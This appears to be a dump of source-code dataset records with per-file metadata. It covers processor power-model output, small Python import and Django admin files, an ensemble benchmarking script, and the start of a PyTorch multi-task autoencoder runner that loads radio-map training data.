'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0894269,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.68832,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.231807,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.303734,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.1829,
'Instruction Fetch Unit/Runtime Dynamic': 0.636924,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0525827,
'L2/Runtime Dynamic': 0.0034163,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.96824,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.833238,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0560059,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0560059,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.23271,
'Load Store Unit/Runtime Dynamic': 1.16545,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.138101,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.276202,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0490125,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0497942,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.353679,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0380247,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.593983,
'Memory Management Unit/Runtime Dynamic': 0.0878189,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.6369,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.50403,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0196637,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.141035,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.66473,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.23805,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.6975723338144482,
'Runtime Dynamic': 0.6975723338144482,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.228277,
'Runtime Dynamic': 0.133249,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 88.4561,
'Peak Power': 121.568,
'Runtime Dynamic': 22.9253,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 88.2278,
'Total Cores/Runtime Dynamic': 22.7921,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.228277,
'Total L3s/Runtime Dynamic': 0.133249,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.043764
| 124
| 0.681994
| 8,082
| 68,590
| 5.781985
| 0.067681
| 0.123604
| 0.11299
| 0.093473
| 0.939589
| 0.930987
| 0.919345
| 0.886518
| 0.863278
| 0.842671
| 0
| 0.131638
| 0.224391
| 68,590
| 914
| 125
| 75.043764
| 0.746762
| 0
| 0
| 0.642232
| 0
| 0
| 0.657594
| 0.048111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fa66191e897b600fad36daad8d96f0c2b5f8443
| 93
|
py
|
Python
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 72
|
2018-01-20T20:50:22.000Z
|
2022-02-27T23:24:21.000Z
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 1
|
2020-02-03T13:43:46.000Z
|
2020-02-03T13:43:46.000Z
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 64
|
2018-01-12T17:13:14.000Z
|
2022-03-14T20:22:46.000Z
|
from sta663.pkg.sub1.sub1_stuff import g1, g2
from sta663.pkg.sub1.more_sub1_stuff import g3
| 31
| 46
| 0.827957
| 18
| 93
| 4.111111
| 0.555556
| 0.27027
| 0.351351
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154762
| 0.096774
| 93
| 2
| 47
| 46.5
| 0.72619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8c035e20af93b4a9437d1bf06d22384db29111c2
| 138
|
py
|
Python
|
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
from ribo_api.services.base import BaseService
from ribo_api.services.user import UserService
from ribo_api.services.api import ApiService
| 46
| 46
| 0.876812
| 21
| 138
| 5.619048
| 0.47619
| 0.20339
| 0.279661
| 0.483051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07971
| 138
| 3
| 47
| 46
| 0.929134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c5cb0f996576be9afa7a1ffbca68a5ff7178000
| 214
|
py
|
Python
|
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | 1
|
2021-02-22T09:57:48.000Z
|
2021-02-22T09:57:48.000Z
|
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | null | null | null |
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | null | null | null |
# django imports
from django.contrib import admin
# lfs imports
from . models import IsSample
from . models import ProductSamplesRelation
admin.site.register(ProductSamplesRelation)
admin.site.register(IsSample)
| 21.4
| 43
| 0.827103
| 25
| 214
| 7.08
| 0.48
| 0.124294
| 0.180791
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11215
| 214
| 9
| 44
| 23.777778
| 0.931579
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fc87eccd2b298f62b5e11f1699e4a410091c837
| 136
|
py
|
Python
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 5
|
2018-04-22T22:44:02.000Z
|
2021-04-26T20:44:44.000Z
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 250
|
2018-04-24T12:04:11.000Z
|
2022-03-09T06:56:47.000Z
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 8
|
2019-04-28T11:33:03.000Z
|
2022-02-26T13:30:36.000Z
|
from django.contrib import admin
from .models import Answer, Question
admin.site.register(Question)
admin.site.register(Answer)
| 19.428571
| 37
| 0.779412
| 18
| 136
| 5.888889
| 0.555556
| 0.245283
| 0.320755
| 0.471698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 6
| 38
| 22.666667
| 0.905983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4ff9300b1d23f8969ba774191d1a4d73a27c9fc9
| 34
|
py
|
Python
|
src/lib/os.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/os.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/os.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("os")
| 17
| 33
| 0.735294
| 6
| 34
| 3.333333
| 0.666667
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b27a2afc6ccae134858a3d18bf5c00c8437e79f
| 3,347
|
py
|
Python
|
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
from benchmark.benchmarker import pickup_benchmark
def run_ensembles(dataset_name, benchmark_file_name):
pickup_benchmark(dataset_name, benchmark_file_name)
if __name__ == '__main__':
# run_ensembles('r_concrete', 'r_concrete_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_concrete', 'r_concrete_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_concrete', 'r_concrete_mlp__2019_02_05__19_26_39.pkl')
# run_ensembles('c_cancer', 'c_cancer_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_cancer', 'c_cancer_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_cancer', 'c_cancer_mlp__2019_02_05__19_12_26.pkl')
# run_ensembles('c_sonar', 'c_sonar_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_sonar', 'c_sonar_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_sonar', 'c_sonar_mlp__2019_02_05__19_12_26.pkl')
# run_ensembles('r_parkinsons', 'r_parkinsons_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_parkinsons', 'r_parkinsons_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_parkinsons', 'r_parkinsons_mlp__2019_02_05__18_43_45.pkl')
# run_ensembles('r_music', 'r_music_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_music', 'r_music_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_music', 'r_music_mlp__2019_02_05__18_43_45.pkl')
# run_ensembles('c_credit', 'c_credit_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_credit', 'c_credit_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_credit', 'c_credit_mlp__2019_02_05__18_10_54.pkl')
# run_ensembles('c_diabetes', 'c_diabetes_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_diabetes', 'c_diabetes_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_diabetes', 'c_diabetes_mlp__2019_02_05__18_10_54.pkl')
# run_ensembles('r_bio', 'r_bio_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_bio', 'r_bio_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_bio', 'r_bio_mlp__2019_02_05__06_13_51.pkl')
# run_ensembles('r_ppb', 'r_ppb_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_ppb', 'r_ppb_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_ppb', 'r_ppb_mlp__2019_02_05__06_13_51.pkl')
# run_ensembles('r_student', 'r_student_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_student', 'r_student_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_student', 'r_student_mlp__2019_02_05__06_13_51.pkl')]
""" not updated: SLM """
# run_ensembles("c_credit", "c_credit_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("c_diabetes", "c_diabetes_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_bio", "r_bio_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_ppb", "r_ppb_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_student", "r_student_slm__2019_01_27__23_03_36.pkl")
""" not updated: MLP """
# run_ensembles("c_credit", "c_credit_mlp__2019_01_29__13_57_03.pkl")
# run_ensembles("c_diabetes", "c_diabetes_mlp__2019_01_29__13_57_03.pkl")
# run_ensembles("r_bio", "r_bio_mlp__2019_01_27__23_03_38.pkl")
# run_ensembles("r_ppb", "r_ppb_mlp__2019_01_27__23_03_38.pkl")
# run_ensembles("r_student", "r_student_mlp__2019_01_27__23_03_38.pkl")
| 53.126984
| 88
| 0.767254
| 610
| 3,347
| 3.395082
| 0.1
| 0.237566
| 0.267986
| 0.177692
| 0.944471
| 0.912603
| 0.898117
| 0.861902
| 0.704491
| 0.60309
| 0
| 0.188806
| 0.113833
| 3,347
| 62
| 89
| 53.983871
| 0.50944
| 0.610696
| 0
| 0
| 0
| 0
| 0.457516
| 0.384804
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8cc988ac6952de00ee50cdb5bd026e28b6ca813b
| 188,066
|
py
|
Python
|
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import torch
import torch.optim as optim
from torch.nn import functional as F
from torch.utils.data import DataLoader, TensorDataset, random_split
from torchvision.utils import save_image
from model.Multitask_AE import MAE, MGVAE, MLVAE, MGMVAE, MLMVAE
import sys
sys.path.append('..')
import random
import scipy.io as sio
from torchinfo import summary
from sklearn.metrics import roc_curve
import cv2
# runner for Multi-task AE
class MAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset)*0.9)
val_size = int(len(dataset)*0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0*self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0*self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0*self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
